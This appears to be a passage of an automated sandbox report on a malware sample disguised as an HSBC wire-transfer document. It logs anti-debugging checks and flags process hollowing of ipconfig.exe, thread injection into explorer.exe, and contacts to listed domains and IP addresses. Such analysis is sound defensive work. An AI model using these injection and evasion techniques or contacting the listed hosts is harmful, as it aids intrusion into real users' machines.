          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EE539 mov eax, dword ptr fs:[00000030h]6_2_016EE539
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8D34 mov eax, dword ptr fs:[00000030h]6_2_016F8D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016AA537 mov eax, dword ptr fs:[00000030h]6_2_016AA537
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D8DF1 mov eax, dword ptr fs:[00000030h]6_2_016D8DF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]6_2_016F05AC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]6_2_016F05AC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016535A1 mov eax, dword ptr fs:[00000030h]6_2_016535A1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]6_2_0165FD9B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]6_2_0165FD9B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164746D mov eax, dword ptr fs:[00000030h]6_2_0164746D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A44B mov eax, dword ptr fs:[00000030h]6_2_0165A44B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]6_2_016BC450
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]6_2_016BC450
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165BC2C mov eax, dword ptr fs:[00000030h]6_2_0165BC2C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E14FB mov eax, dword ptr fs:[00000030h]6_2_016E14FB
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]6_2_016A6CF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8CD6 mov eax, dword ptr fs:[00000030h]6_2_016F8CD6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163849B mov eax, dword ptr fs:[00000030h]6_2_0163849B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163FF60 mov eax, dword ptr fs:[00000030h]6_2_0163FF60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8F6A mov eax, dword ptr fs:[00000030h]6_2_016F8F6A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163EF40 mov eax, dword ptr fs:[00000030h]6_2_0163EF40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]6_2_01624F2E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]6_2_01624F2E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165E730 mov eax, dword ptr fs:[00000030h]6_2_0165E730
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]6_2_0164B73D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]6_2_0164B73D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]6_2_016F070D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]6_2_016F070D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]6_2_0165A70E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]6_2_0165A70E
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164F716 mov eax, dword ptr fs:[00000030h]6_2_0164F716
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]6_2_016BFF10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]6_2_016BFF10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016637F5 mov eax, dword ptr fs:[00000030h]6_2_016637F5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638794 mov eax, dword ptr fs:[00000030h]6_2_01638794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]6_2_016A7794
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163766D mov eax, dword ptr fs:[00000030h]6_2_0163766D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]6_2_0164AE73
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]6_2_01637E41
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]6_2_016EAE44
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]6_2_016EAE44
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162E620 mov eax, dword ptr fs:[00000030h]6_2_0162E620
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFE3F mov eax, dword ptr fs:[00000030h]6_2_016DFE3F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]6_2_0162C600
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01658E00 mov eax, dword ptr fs:[00000030h]6_2_01658E00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1608 mov eax, dword ptr fs:[00000030h]6_2_016E1608
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]6_2_0165A61C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]6_2_0165A61C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016376E2 mov eax, dword ptr fs:[00000030h]6_2_016376E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016516E0 mov ecx, dword ptr fs:[00000030h]6_2_016516E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01668EC7 mov eax, dword ptr fs:[00000030h]6_2_01668EC7
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016536CC mov eax, dword ptr fs:[00000030h]6_2_016536CC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFEC0 mov eax, dword ptr fs:[00000030h]6_2_016DFEC0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8ED6 mov eax, dword ptr fs:[00000030h]6_2_016F8ED6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]6_2_016F0EA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A46A7 mov eax, dword ptr fs:[00000030h]6_2_016A46A7
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFE87 mov eax, dword ptr fs:[00000030h]6_2_016BFE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB60 mov ecx, dword ptr fs:[00000030h]16_2_0364DB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]16_2_03673B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]16_2_03673B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364DB40 mov eax, dword ptr fs:[00000030h]16_2_0364DB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03718B58 mov eax, dword ptr fs:[00000030h]16_2_03718B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364F358 mov eax, dword ptr fs:[00000030h]16_2_0364F358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370131B mov eax, dword ptr fs:[00000030h]16_2_0370131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]16_2_036703E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366DBE9 mov eax, dword ptr fs:[00000030h]16_2_0366DBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]16_2_036C53CA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0040ACF0 LdrLoadDll
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exe; Domain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exe; Domain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exe; Domain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C50000

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Thread APC queued: target process: C:\Windows\explorer.exe

          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\ipconfig.exe; Thread register set: target process: 3352
